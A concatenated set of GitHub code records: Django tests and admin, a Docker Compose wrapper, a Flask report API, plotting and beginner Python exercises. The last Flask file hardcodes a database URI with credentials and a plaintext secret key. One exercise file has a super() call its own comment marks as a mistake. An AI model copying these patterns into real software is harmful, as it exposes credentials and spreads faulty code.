Check that ir.state == 'completed'.\n \"\"\"\n happy_versions = file_versions[:-1]\n # An initial IngestRun with no issues\n happy_ir = setup_ingest_run(happy_versions, user)\n run_ingest(happy_ir.id)\n\n assert IngestRun.objects.all().count() == 1\n mock_genomic_workflow.assert_called_once()\n mock_genomic_workflow.reset_mock()\n happy_ir = IngestRun.objects.get(pk=happy_ir.id)\n assert happy_ir.state == \"completed\"\n assert not happy_ir.error_msg\n\n \"\"\"\n 2) Non-GWO Case\n Call run_ingest on an IngestRun with a version that doesn't have a GWO\n root_file. Exception should be raised, and state should become failed.\n \"\"\"\n bad_ir = setup_ingest_run(file_versions, user)\n with pytest.raises(Exception):\n assert run_ingest(bad_ir.id)\n bad_ir = IngestRun.objects.get(pk=bad_ir.id)\n assert bad_ir.state == \"failed\"\n assert \"Unknown file type detected\" in bad_ir.error_msg\n\n \"\"\"\n 3) Exception Case\n Call run_ingest on an IngestRun with all GWO versions. 
Mock out\n _ingest_genomic_workflow_manifest_ and give it an exception side effect\n and check that the IngestRun goes to a failed state.\n \"\"\"\n ER = \"ERROR\"\n except_ir = setup_ingest_run(happy_versions[:1], user)\n mock_genomic_workflow.side_effect = Exception(ER)\n with pytest.raises(Exception):\n run_ingest(except_ir.id)\n mock_genomic_workflow.assert_called_once()\n except_ir = IngestRun.objects.get(pk=except_ir.id)\n assert except_ir.state == \"failed\"\n assert ER == except_ir.error_msg\n\n\ndef test_ingest_gwo_feat_flag(db, clients, mocker, prep_file, settings):\n \"\"\"\n Test that running the GWO manifest ingest pipeline does not work when the\n feature flag is turned off.\n \"\"\"\n client = clients.get(\"Administrators\")\n settings.FEAT_INGEST_GENOMIC_WORKFLOW_OUTPUTS = False\n mock_genomic_workflow = mocker.patch(\n \"creator.ingest_runs.tasks.ingest_genomic_workflow_output_manifests\"\n )\n\n user = User.objects.first()\n # Create data.\n for _ in range(3):\n prep_file(authed=True)\n files = list(File.objects.all())\n versions = []\n for file_ in files:\n file_.file_type = FileType.GWO.value\n file_.save()\n versions.append(file_.versions.first())\n\n ir = setup_ingest_run(versions, user)\n with pytest.raises(Exception) as ex:\n run_ingest(ir.id)\n assert str(ex.value).startswith(\"Ingesting genomic workflow\")\n assert IngestRun.objects.all().count() == 1\n ir = IngestRun.objects.get(pk=ir.id)\n assert ir.state == \"failed\"\n assert \"output manifests is not enabled\" in ir.error_msg\n mock_genomic_workflow.assert_not_called()\n\n\ndef test_cancel_ingest(db, clients, prep_file):\n \"\"\"\n Test the cancel_ingest function.\n \"\"\"\n client = clients.get(\"Administrators\")\n\n # Create some data\n for i in range(2):\n prep_file(authed=True)\n file_versions = [f.versions.first() for f in File.objects.all()]\n user = User.objects.first()\n ir = setup_ingest_run(file_versions, user)\n ir.start()\n ir.start_cancel()\n ir.save()\n cancel_ingest(ir.id)\n ir = IngestRun.objects.get(pk=ir.id)\n assert IngestRun.objects.all().count() == 1\n assert ir.state == \"canceled\"\n\n\ndef test_cancel_validation(db, clients):\n \"\"\"\n Test the cancel_validation function.\n \"\"\"\n # Create a validation run\n vr = ValidationRunFactory()\n vr.initialize()\n vr.start()\n vr.start_cancel()\n vr.save()\n cancel_validation(vr.pk)\n vr = ValidationRun.objects.get(pk=vr.pk)\n assert ValidationRun.objects.all().count() == 1\n assert vr.state == \"canceled\"\n\n\ndef test_ingest_genomic_workflow_output_manifests(\n db, clients, prep_file, mocker\n):\n \"\"\"\n Test the _ingest_genomic_workflow_output_manifests_ function.\n \"\"\"\n mock_ingest = mocker.patch(\n \"creator.ingest_runs.tasks.ingest_run.GenomicDataLoader.ingest_gwo\"\n )\n mock_extract = mocker.patch(\n \"creator.ingest_runs.tasks.ingest_run.extract_data\",\n return_value=[{\"Test\": \"Test\"}],\n )\n for _ in range(2):\n prep_file(authed=True)\n file_versions = [f.versions.first() for f in File.objects.all()]\n user = User.objects.first()\n ir = setup_ingest_run(file_versions, user)\n ingest_genomic_workflow_output_manifests(ir)\n mock_ingest.assert_called_once()\n\n\ndef setup_ingest_run(file_versions, user):\n ir = IngestRun()\n ir.creator = user\n ir.initialize()\n ir.save()\n ir.versions.set(file_versions)\n ir.save()\n return 
ir\n","repo_name":"kids-first/kf-api-study-creator","sub_path":"tests/ingest_runs/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"9792683188","text":"from django.contrib import admin\nfrom .models import Currency, Config, Contractor, Company, Customer, Supplier, Country, \\\n Warehouse, FreightPackingType, FPIdentified, Unit, Product, \\\n OrderDoc, OrderProductTable, AcceptFPUnknownDoc, InspectFPDoc, InspectFPTable, \\\n WayBillDoc, WayBillProductTable, AcceptFPUnknownTable, WayBillStatus, InspectProductDoc, InspectProductTable, \\\n MyUser, Phone\nfrom django.contrib.contenttypes.admin import GenericTabularInline\n\n\nclass PhoneInline(GenericTabularInline):\n model = Phone\n list_display = ['number']\n fields = ['number']\n extra = 1\n\n\nclass OrderProductInline(admin.TabularInline):\n model = OrderProductTable\n fields = OrderProductTable.form_edit_fields()\n list_display = OrderProductTable.table_fields()\n extra = 1\n\n\nclass PhoneAdmin(admin.ModelAdmin):\n def Telephone_reg_column(self, obj):\n return obj.content_object if obj.content_object else None\n\n fieldsets = [\n ('Телефоны контрагентов :', {'fields': ['number', 'content_type', 'content_object']}),\n ]\n\n readonly_fields = ['content_object', 'content_type']\n\n list_display = Phone.telephones_table_fields()\n\n\nclass OrderAdmin(admin.ModelAdmin):\n list_display = OrderDoc.table_fields()\n fields = OrderDoc.form_edit_fields()\n inlines = [\n OrderProductInline,\n ]\n\n\nclass WaybillProductInline(admin.TabularInline):\n model = WayBillProductTable\n fields = WayBillProductTable.form_edit_fields()\n list_display = WayBillProductTable.table_fields()\n extra = 1\n\n\n# class WaybillFreightPackingInline(admin.TabularInline):\n# model = WaybillFreightPacking\n# list_display = WaybillFreightPacking.table_fields()\n# fields = WaybillFreightPacking.form_edit_fields()\n# extra = 1\n\n\n# class FreightPackingAcceptedInline(admin.TabularInline):\n# model = AcceptFPUnknownTable\n# list_display = AcceptFPUnknownTable.table_fields()\n# fields = AcceptFPUnknownTable.form_edit_fields()\n# extra = 1\n\n\nclass WayBillStatusAdmin(admin.ModelAdmin):\n def doc_reg_column(self, obj):\n return obj.doc_reg if obj.doc_reg else None\n\n list_display = WayBillStatus.table_fields()\n # fields = WayBillStatus.form_edit_fields()\n doc_reg_column.short_description = u'Регистратор'\n\n fieldsets = [\n (None, {'fields': ['dt', 'wb', 'status', 'desc', 'content_type', 'object_id', 'doc_reg']}),\n ]\n readonly_fields = ['doc_reg']\n\n\nclass WayBillStatusInline(GenericTabularInline):\n model = WayBillStatus\n list_display = WayBillStatus.table_fields()\n fields = WayBillStatus.form_edit_fields()\n extra = 1\n\n\nclass WaybillAdmin(admin.ModelAdmin):\n list_display = WayBillDoc.table_fields()\n fields = WayBillDoc.form_edit_fields()\n inlines = [\n WaybillProductInline,\n # FreightPackingAcceptedInline,\n # WaybillFreightPackingInline,\n # WayBillStatusInline,\n ]\n\n def get_status(self, obj):\n object_status = WayBillStatus.objects.filter(\n wb=obj\n ).order_by('-dt').first()\n if object_status:\n try:\n return list((filter(lambda x: object_status.status in x, object_status.STATUS)))[0][1]\n except:\n pass\n return 'Нет зарегистрированных статусов'\n\n get_status.short_description = u'Статус ТТН'\n\n def get_inline_instances(self, request, obj=None):\n to_return = super(WaybillAdmin, self).get_inline_instances(request, obj)\n # Разрешаем добавлять в связанные таблицы только если ТНТ уже существует\n if not obj:\n # to_return = [x for x in to_return if not isinstance(x, WaybillProductInline)]\n to_return = []\n return to_return\n\n\nclass 
AcceptFPUnknownTableInline(admin.TabularInline):\n model = AcceptFPUnknownTable\n list_display = AcceptFPUnknownTable.table_fields()\n fields = AcceptFPUnknownTable.form_edit_fields()\n extra = 1\n\n\nclass AcceptFPUnknownDocAdmin(admin.ModelAdmin):\n list_display = AcceptFPUnknownDoc.table_fields()\n fields = AcceptFPUnknownDoc.form_edit_fields()\n inlines = [\n AcceptFPUnknownTableInline,\n ]\n\n\nclass InspectFPTableInline(admin.TabularInline):\n model = InspectFPTable\n list_display = InspectFPTable.table_fields()\n fields = InspectFPTable.form_edit_fields()\n extra = 1\n\n\nclass InspectFPDocAdmin(admin.ModelAdmin):\n list_display = InspectFPDoc.table_fields()\n fields = InspectFPDoc.form_edit_fields()\n inlines = [\n InspectFPTableInline,\n ]\n\n\nclass InspectProductTableInline(admin.TabularInline):\n model = InspectProductTable\n list_display = InspectProductTable.table_fields()\n fields = InspectProductTable.form_edit_fields()\n extra = 1\n\n\nclass InspectProductDocAdmin(admin.ModelAdmin):\n list_display = InspectProductDoc.table_fields()\n fields = InspectProductDoc.form_edit_fields()\n inlines = [\n InspectProductTableInline,\n ]\n\n\nclass ProductAdmin(admin.ModelAdmin):\n list_display = Product.table_fields()\n fields = Product.form_edit_fields()\n\n\nclass CurrencyAdmin(admin.ModelAdmin):\n list_display = Currency.table_fields()\n fields = Currency.form_edit_fields()\n\n\nclass CountryAdmin(admin.ModelAdmin):\n list_display = Country.table_fields()\n fields = Country.form_edit_fields()\n\n\nclass WarehouseAdmin(admin.ModelAdmin):\n list_display = Warehouse.table_fields()\n fields = Warehouse.form_edit_fields()\n\n\nclass FreightPackingTypeAdmin(admin.ModelAdmin):\n list_display = FreightPackingType.table_fields()\n fields = FreightPackingType.form_edit_fields()\n\n\nclass UnitAdmin(admin.ModelAdmin):\n list_display = Unit.table_fields()\n fields = Unit.form_edit_fields()\n\n\nclass FreightPackingAdmin(admin.ModelAdmin):\n list_display = FPIdentified.table_fields()\n fields = FPIdentified.form_edit_fields()\n list_filter = ('fp_type',)\n\n\nclass ContractorAdmin(admin.ModelAdmin):\n list_filter = ('contractor_type', 'country')\n list_display = Contractor.table_fields()\n search_fields = Contractor.table_fields()\n # fields = Contractor.form_edit_fields()\n fieldsets = (\n (None, {\n 'fields': (\n ('contractor_type', 'code', 'name'), 'country',\n )\n }),\n ('Наименования', {\n 'classes': ('collapse',),\n 'fields': (\n 'name_legal',\n ('first_name', 'last_name'),\n ),\n }),\n ('Налоговые коды', {\n 'classes': ('collapse',),\n 'fields': (\n ('tax_number', 'accounting_number'),\n ),\n 'description': 'Тут содержатся налоговые данные, необходимые для оформления документов ',\n }),\n )\n\n inlines = [\n PhoneInline,\n ]\n\n\nclass MyUserAdmin(admin.ModelAdmin):\n # fields = ('address', 'address_optional', 'country', 'city', 'zip', 'shipping_address_optional', 'shipping_address',\n # 'shipping_country', 'shipping_city', 'shipping_zip',)\n list_display = ('username', 'email', 'first_name', 'last_name', 'address',)\n\n\nadmin.site.site_header = 'Dropshipping (admin-panel)'\n\nadmin.site.register(Phone, PhoneAdmin)\nadmin.site.register(MyUser, MyUserAdmin)\nadmin.site.register(OrderDoc, OrderAdmin)\nadmin.site.register(WayBillDoc, WaybillAdmin)\nadmin.site.register(AcceptFPUnknownDoc, AcceptFPUnknownDocAdmin)\nadmin.site.register(InspectFPDoc, InspectFPDocAdmin)\nadmin.site.register(InspectProductDoc, InspectProductDocAdmin)\nadmin.site.register(WayBillStatus, 
WayBillStatusAdmin)\nadmin.site.register(Product, ProductAdmin)\nadmin.site.register(Currency, CurrencyAdmin)\nadmin.site.register(FreightPackingType, FreightPackingTypeAdmin)\nadmin.site.register(FPIdentified, FreightPackingAdmin)\nadmin.site.register(Company, ContractorAdmin)\nadmin.site.register(Warehouse, WarehouseAdmin)\nadmin.site.register(Customer, ContractorAdmin)\nadmin.site.register(Supplier, ContractorAdmin)\nadmin.site.register(Country, CountryAdmin)\nadmin.site.register(Unit, UnitAdmin)\nadmin.site.register([Config, ])\n","repo_name":"Nerimellx/Django-dropshipping","sub_path":"hellouser/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":8271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
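`PhoneInline` above is a `GenericTabularInline`, which requires the imported `Phone` model to carry a generic foreign key; the record does not show that model. A minimal sketch of the shape such an inline assumes, using Django's standard contenttypes fields (the field names follow the admin code above and Django conventions; runnable only inside a configured Django project):

from django.db import models
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType

class Phone(models.Model):
    number = models.CharField(max_length=32)
    # Generic relation: one Phone table can attach to Customer, Supplier, etc.
    content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
    object_id = models.PositiveIntegerField()
    content_object = GenericForeignKey("content_type", "object_id")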
+{"seq_id":"42279885821","text":"from python_on_whales import DockerClient\nfrom components.exceptions import ComposeInitialization, UnknownBroker, Unimplemented\nfrom utils.file_utils import get_container_names_from_compose_file\n\n\nclass Compose:\n def __init__(self):\n self.brokers = {\n \"Lepus\": [\"./composes/lepus.yml\"],\n \"Orion-LD\": [\"./composes/orionld.yml\"],\n \"Stellio\": [\"./composes/stellio.yml\"],\n \"Scorpio\": [\"./composes/scorpio.yml\"],\n }\n self.container_names = { broker: get_container_names_from_compose_file(self.brokers[broker][0]) for broker in self.brokers.keys() }\n\n self.dockerEngine = None\n self.broker = None\n self.containers = list()\n\n def initialize(self, broker):\n try:\n self.broker = broker\n compose_files = self.brokers[broker]\n except KeyError:\n # The broker value send to the initialize process is not included in the valid values\n raise UnknownBroker(data=broker,\n message=f'Unknown Context Broker name. Valid values: {self.brokers.keys()}')\n\n # At the moment Scorpio and Stellio are not implemented, therefore we raise an exception Unimplemented\n if len(compose_files) == 0:\n raise Unimplemented(data=broker)\n\n self.dockerEngine = DockerClient(compose_files=compose_files,\n compose_env_file=\"./composes/.env\")\n\n def up(self):\n if self.dockerEngine is None:\n # Error, we need to call before the initialize operation to keep the broker and create the dockerEngine\n raise ComposeInitialization(data='')\n else:\n self.dockerEngine.compose.build()\n self.dockerEngine.compose.up(detach=\"True\")\n\n def down(self):\n if self.dockerEngine is None:\n # Error, we need to call before the initialize operation to keep the broker and create the dockerEngine\n raise ComposeInitialization(data='')\n else:\n self.dockerEngine.compose.down(volumes=\"True\")\n\n def check_health_status(self):\n \"\"\"\n When a container has a HealthCheck specified, it has a health status in addition to its normal status.\n A Docker container can have three health statuses:\n - starting: This takes up to 30 seconds to run, and represents the process of the container booting up\n - healthy: The container will continue to run its Health Check at every specified interval\n - unhealthy: After a certain number of consecutive failures the container's status will be unhealthy\n\n :return:\n \"\"\"\n if self.dockerEngine is None:\n # Error, we need to call before the initialize operation to keep the broker and create the dockerEngine\n raise ComposeInitialization(data='')\n else:\n status = self.dockerEngine.compose.ps(all=True)\n self.containers = [x.name for x in status if x.name in self.container_names[self.broker]]\n\n status = self.dockerEngine.container.inspect(self.containers)\n status = [{\"name\": x.name, \"health\": x.state.health.status if x.state.health is not None else \"unknown\", \"status\": x.state.status} for x in status]\n\n health_status = [x['health'] if 'health' in x else \"unknown\" for x in status]\n \n if True in [ele == \"unknown\" for ele in health_status]:\n res = \"unknown\"\n elif True in [ele == \"unhealthy\" for ele in health_status] or True in [ele == \"exited\" for ele in health_status]:\n res = \"unhealthy\"\n elif True in [ele == \"starting\" for ele in health_status]:\n res = \"starting\"\n else:\n res = \"healthy\"\n\n response = {\n \"status\": res,\n \"containers\": status\n }\n\n return 
response\n","repo_name":"flopezag/BrokerCleaner","sub_path":"components/compose.py","file_name":"compose.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"16861018735","text":"#\n# Date 6th Aug 2020\n# Super() format differnt in py2.7 \n# Class code for experiment.\n#\n\nclass MyClass:\n\tx = 5\n\nclass Person:\n\tdef __init__(self, name, age):\n\t\tself.name = name\n\t\tself.age = age\n\n\tdef myfun(self):\n \tprint(\"Hello the Name is \" + self.name)\n\np1 = MyClass()\np2 = Person(\"Rav\", 22)\n\np2.myfun()\nprint(p2.name)\nprint(p2.age)\nprint(p1.x)\n\n#\n# Humman code for verification\n#\n\nclass Human():\n\tdef __init__(self, fname, lname):\n\t\tself.fname = fname\n\t\tself.lname = lname\n\n\nclass Freshman(Human):\n\tdef __init__(self, fname, lname, year):\n\t\tsuper(Freshman, self).__init__(fname, lname, year) # super format mistake\n\t\tself.year = year\n\n\tdef examl(self):\n\t\tprint(\"Exam for \", self.fname, self.lname, \"for ths year\")\n\n\nx = Freshman(\"Rav\", \"Holo\", \"2020\")\nx.examl()\t\t\n","repo_name":"amtdas/pybin","sub_path":"broken-class.py","file_name":"broken-class.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1679896140","text":"import csv\n\ndef raw_data_gen(n):\n '''\n generator for mock data\n\n\n yields str generators\n '''\n for i in range(n):\n yield (f'{i}_{j}' for j in range(4))\n\n\n#create/overwirte a file with rawdata\nwith open('data_file.csv', 'w', newline='') as data_buffer:\n file_writer = csv.writer(data_buffer)\n file_writer.writerows(raw_data_gen(5))\n\n\n#reads a file with rawdata and prints it\nwith open('data_file.csv', 'r', newline='') as data_buffer:\n file_reader = csv.reader(data_buffer)\n for row in file_reader:\n print(row)\n\n","repo_name":"katherinespiess/bcc_2020_2_prjsft2","sub_path":"2020-08-28 - aula02 - desenvolvimento hello world/csv_test.py","file_name":"csv_test.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73948106789","text":"# Reduce\n# Reduction -> Reduce\n# Reduce = Binary_function, sequence\nfrom functools import reduce\na = [1,2,3,4,5,6]\nb = reduce(lambda x,y:x*y,a)\nprint(b)\nb = reduce(lambda x,y:x*y,[1,2,3,4,5])\nprint('x*y result = ',b)\nb = reduce(lambda x,y:x+y,[1,2,3,4,5])\nprint('x+y result = ',b)\n\n","repo_name":"zamanwebdeveloper/OOP_in_Python","sub_path":"Python 3.8 Programming/ReduceWithLamda.py","file_name":"ReduceWithLamda.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"2253605798","text":"# Usual imports for plotting\r\n# import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport sys\r\nimport os\r\n\r\ndef plotSingleTP(data,label,marker,color):\r\n # Read in Latency Text files from various Locks and store in array. V\r\n directory = os.path.dirname(os.path.abspath(__file__))\r\n #text_files = [file_name for file_name in os.listdir(directory) if file_name.startswith(\"TPHighContention\")]\r\n data_file = data\r\n threads = []\r\n means = []\r\n stdDevs = []\r\n # for file_name in text_files:\r\n file_path = os.path.join(directory, data_file)\r\n with open(file_path, 'r') as file:\r\n lines = file.readlines()\r\n table_lines = lines[5:] # Discard the first 5 lines\r\n for line in table_lines:\r\n values = line.strip().split(',')\r\n if len(values) == 3:\r\n threads.append(float(values[0]))\r\n means.append(float(values[1]))\r\n stdDevs.append(float(values[2]))\r\n\r\n\r\n df = {\"Threads\": threads, \"Means\": means, \"stdDevs\": stdDevs}\r\n plt.plot(df[\"Threads\"], df[\"Means\"], label = label, marker = marker, color = color)\r\n plt.errorbar(df[\"Threads\"], df[\"Means\"], df[\"stdDevs\"], linestyle='None', marker=marker, capsize=2, color = color)\r\n\r\ndef plotLockTPHigh():\r\n # Get the current directory\r\n current_directory = os.path.dirname(os.path.abspath(__file__))\r\n # Get the parent directory\r\n parent_directory = os.path.dirname(current_directory)\r\n data_directory = os.path.join(parent_directory,\"data\",\"throughput\")\r\n data_files = [file_name for file_name in os.listdir(data_directory) if file_name.startswith(\"TPHighContention\")]\r\n markers = ['+', '.', '*', 'o', 'v', 'x','^','+']\r\n colors = ['red', \"pink\",'green', 'blue', 'yellow', \"black\", \"purple\",'grey']\r\n\r\n for data_file, marker, color in zip(data_files ,markers,colors):\r\n file_path = os.path.join(data_directory, data_file)\r\n lock_name = data_file.split('TPHighContention')[1].split('.txt')[0]\r\n plotSingleTP(data=file_path,label=lock_name, marker=marker, color=color)\r\n \r\n plt.xlabel(\"Threads\")\r\n plt.ylabel(\"Aggregate throughput rate: ops/sec\")\r\n plt.xscale(\"log\")\r\n plt.yscale(\"log\")\r\n plt.xticks([1,2,5,10,20,50,64],[1,2,5,10,20,50,64])\r\n plt.legend()\r\n plt.grid()\r\n plt.savefig(\"plots/TPHighContention.svg\")\r\n plt.show()\r\n\r\ndef plotLockTPLow():\r\n # Get the current directory\r\n current_directory = os.path.dirname(os.path.abspath(__file__))\r\n # Get the parent directory\r\n parent_directory = os.path.dirname(current_directory)\r\n data_directory = os.path.join(parent_directory,\"data\",\"throughput\")\r\n data_files = [file_name for file_name in os.listdir(data_directory) if file_name.startswith(\"TPLowContention\")]\r\n markers = ['+', '.', '*', 'o', 'v', 'x','^','+']\r\n colors = ['red', \"pink\",'green', 'blue', 'yellow', \"black\", \"purple\",\"grey\"]\r\n\r\n\r\n for data_file, marker, color in zip(data_files ,markers ,colors):\r\n file_path = os.path.join(data_directory, data_file)\r\n lock_name = data_file.split('TPLowContention')[1].split('.txt')[0]\r\n plotSingleTP(data=file_path,label=lock_name, marker=marker,color=color)\r\n plt.xlabel(\"Threads\")\r\n plt.ylabel(\"Aggregate throughput rate: ops/sec\")\r\n plt.xscale(\"log\")\r\n #plt.yscale(\"log\")\r\n plt.xticks([1,2,5,10,20,50,64],[1,2,5,10,20,50,64])\r\n plt.legend()\r\n plt.grid()\r\n plt.show()\r\n plt.savefig(\"plots/TPLowContention.svg\")\r\n \r\n\r\n\r\nif __name__ == \"__main__\": \r\n if sys.argv[1] == 
\"high\":\r\n plt.figure(figsize=(10,6))\r\n plotLockTPHigh()\r\n\r\n if sys.argv[1] == \"low\":\r\n plt.figure(figsize=(10,6))\r\n plotLockTPLow()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"simon-koenig/Hardware-Locks","sub_path":"src/plotTP.py","file_name":"plotTP.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"26880585571","text":"import hashlib\nimport json\nfrom csv import DictWriter\nfrom datetime import datetime\nfrom io import BytesIO, StringIO\n\nfrom flask import send_file\nfrom flask.json import jsonify\nfrom flask_restful import Resource, marshal, reqparse\n\nfrom app import auth\nfrom app.utils.report import ReportGenerator\nfrom app.utils.schema import ReportSchema\n\n\nclass BaseReportResource(Resource):\n \"\"\"This is base class for Report Generation routes\n \"\"\"\n decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('group_by',\n type=str,\n action='append',\n choices=('year', 'agency', 'product_line'),\n required=True)\n self.reqparse.add_argument('start_year', type=str, required=True)\n self.reqparse.add_argument('end_year', type=str, required=True)\n self.reqparse.add_argument('aggregation',\n type=str,\n required=False,\n default='sum',\n choices=('mean', 'sum'))\n self.reqparse.add_argument('agency', type=str, required=False)\n self.reqparse.add_argument('product_line', type=str, required=False)\n super(BaseReportResource, self).__init__()\n\n\nclass ReportResource(BaseReportResource):\n def get(self):\n \"\"\"Generates reports based on parameters\n\n .. :quickref: Generate report\n\n **Example request**:\n\n .. http:example:: curl wget httpie python-requests\n\n GET /api/v1/report/ HTTP/1.1\n Host: britecore-assignment.herokuapp.com\n Accept: application/json\n Authorization: Basic YWRtaW46YWRtaW4=\n\n :query group_by: year\n :query start_year: 2005\n :query end_year: 2007 \n\n :query string group_by: Columns by which group by is to perform. One of ``year``, ``ageny``, ``hit``, ``product_line``\n :query string start_year: Start year of date range\n :query string end_year: End year of date range\n :query string aggregation: Aggregation function to use. One of ``sum``, ``mean``. Default is ``sum``. Optional\n :query string agency: Agency Id to consider data only specific to that agency. Optional\n :query string product_line: Product Line to consider data only specific to that product line. Optional\n \n **Example response**:\n\n .. 
sourcecode:: http\n\n HTTP/1.1 200 OK\n Vary: Accept\n Content-Type: application/json\n\n {\n \"data\": [\n {\n \"agency\": null,\n \"earned_premium\": 274675017.4599997,\n \"incurred_losses\": 117393349.14999987,\n \"mean_loss_ratio\": 1285.3961976702374,\n \"mean_retention_ratio\": 0.3373681922621354,\n \"new_business_in_written_premium\": 33192077.359999966,\n \"policy_inforce_quantity\": 2824264,\n \"product_line\": null,\n \"retention_policy_quantity\": 2485771,\n \"total_written_premium\": 274320178.95000064,\n \"year\": \"2005\"\n },\n {\n \"agency\": null,\n \"earned_premium\": 410581483.9599992,\n \"incurred_losses\": 215616372.25999993,\n \"mean_loss_ratio\": 910.8174490424989,\n \"mean_retention_ratio\": 0.317405557905061,\n \"new_business_in_written_premium\": 53898372.57000006,\n \"policy_inforce_quantity\": 4223340,\n \"product_line\": null,\n \"retention_policy_quantity\": 3708433,\n \"total_written_premium\": 412880799.3700002,\n \"year\": \"2006\"\n },\n {\n \"agency\": null,\n \"earned_premium\": 408430805.0600007,\n \"incurred_losses\": 232238370.9800001,\n \"mean_loss_ratio\": 804.9616474706926,\n \"mean_retention_ratio\": 0.3063852120589169,\n \"new_business_in_written_premium\": 44707526.20999996,\n \"policy_inforce_quantity\": 4125077,\n \"product_line\": null,\n \"retention_policy_quantity\": 3687600,\n \"total_written_premium\": 408545579.0100004,\n \"year\": \"2007\"\n }\n ],\n \"message\": null,\n \"status\": \"success\"\n }\n\n :resheader Content-Type: application/json\n :statuscode 200: Everything works fine and returns report based on given date range\n :statuscode 400: Invalid request\n\n \"\"\"\n args = self.reqparse.parse_args()\n\n report = ReportGenerator(args)\n df = report.generate()\n\n response = {\n 'data': marshal(df.to_dict('records'), ReportSchema),\n 'status': 'success',\n 'message': None\n }\n return jsonify(response)\n\n\nclass CSVReportResource(BaseReportResource):\n def get(self):\n \"\"\"Generate CSV report with premium information\n\n .. :quickref: Generate CSV report\n\n **Example request**:\n\n .. http:example:: curl wget httpie python-requests\n\n GET /api/v1/report/csv HTTP/1.1\n Host: britecore-assignment.herokuapp.com\n Accept: text/csv\n Authorization: Basic YWRtaW46YWRtaW4=\n\n :query group_by: year\n :query start_year: 2005\n :query end_year: 2007 \n\n :query string group_by: Columns to group by. One of ``year``, ``agency``, ``product_line``\n :query string start_year: Start year of date range\n :query string end_year: End year of date range\n :query string aggregation: Aggregation function to use. One of ``sum``, ``mean``. Default is ``sum``. Optional\n :query string agency: Agency Id to consider data only specific to that agency. Optional\n :query string product_line: Product Line to consider data only specific to that product line. Optional\n \n **Example response**:\n\n .. 
sourcecode:: http\n\n HTTP/1.1 200 OK\n Vary: Accept\n Content-Type: text/csv\n\n 2005,2485771,2824264,33192077.359999966,274320178.95000064,274675017.4599997,117393349.14999987,0.3373681922621354,1285.3961976702374\n 2006,3708433,4223340,53898372.57000006,412880799.3700002,410581483.9599992,215616372.25999993,0.317405557905061,910.8174490424989\n 2007,3687600,4125077,44707526.20999996,408545579.0100004,408430805.0600007,232238370.9800001,0.3063852120589169,804.9616474706926\n\n :resheader Content-Type: text/csv\n :statuscode 200: Everything works fine and returns report based on given date range\n :statuscode 400: Invalid request\n\n \"\"\"\n args = self.reqparse.parse_args()\n\n report = ReportGenerator(args)\n df = report.generate()\n\n request_params = {k: v for k, v in args.items() if v}\n generate_date = datetime.utcnow().strftime('%Y%m%d')\n\n filename = \"report_{unique_hash}_{generate_date}.csv\".format(\n unique_hash=hashlib.md5(\n json.dumps(request_params).encode('utf-8')).hexdigest(),\n generate_date=generate_date)\n\n buffer = StringIO()\n writer = DictWriter(buffer, df.columns, delimiter=',')\n writer.writeheader()\n for row in df.to_dict('records'):\n writer.writerow(row)\n\n buffer.seek(0)\n buffer = BytesIO(buffer.read().encode('utf-8'))\n mimetype = 'text/csv; charset=utf-8' # the header name itself must not be part of the mimetype value\n\n return send_file(buffer,\n attachment_filename=filename,\n as_attachment=True,\n mimetype=mimetype)\n","repo_name":"mhetrerajat/britecore_assignment","sub_path":"app/resources/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":8160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
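# Editor's note: standalone sketch of how the CSV attachment filename above is built --
# an md5 digest of the JSON-encoded request parameters plus a UTC date stamp, so the
# same query always maps to the same file name on a given day.
import hashlib
import json
from datetime import datetime

request_params = {"group_by": ["year"], "start_year": "2005", "end_year": "2007"}
filename = "report_{unique_hash}_{generate_date}.csv".format(
    unique_hash=hashlib.md5(json.dumps(request_params).encode("utf-8")).hexdigest(),
    generate_date=datetime.utcnow().strftime("%Y%m%d"),
)
print(filename)  # report_<32 hex chars>_<YYYYMMDD>.csv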
+{"seq_id":"69979099750","text":"\"\"\"\nTo run locally:\n virtual machine: source virtual/bin/activate\n python3 app.py --debug\nGo to http://localhost:8111 in your browser.\n\nAfter cloning, make virtual env\nsource virtual/bin/activate\nexport FLASK_ENV=development\nexport FLASK_APP=app.py\nPip install flask\npip install Flask-SQLAlchemy\npip3 install Flask-WTF\nTo fix psycopg2 error:\nsudo pip3 install psycopg2-binary\npip install psycopg2-binary --user\n\nTips: If you get a NoType error, just delete your cookies\n\"\"\"\n\nimport os\nfrom sqlalchemy import *\nfrom sqlalchemy.pool import NullPool\nfrom flask import Flask, request, render_template, g, redirect, Response, flash, url_for, session\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom datetime import datetime\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, PasswordField, IntegerField, DateField, TextAreaField, TimeField\nfrom wtforms.validators import DataRequired, NumberRange\nfrom wtforms.widgets import TextArea\n\n# Create a Flask Instance\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'databases'\n\nDATABASEURI = \"postgresql://aj2604:316@34.75.94.195/proj1part2\"\nengine = create_engine(DATABASEURI)\n\ncurrent_user = 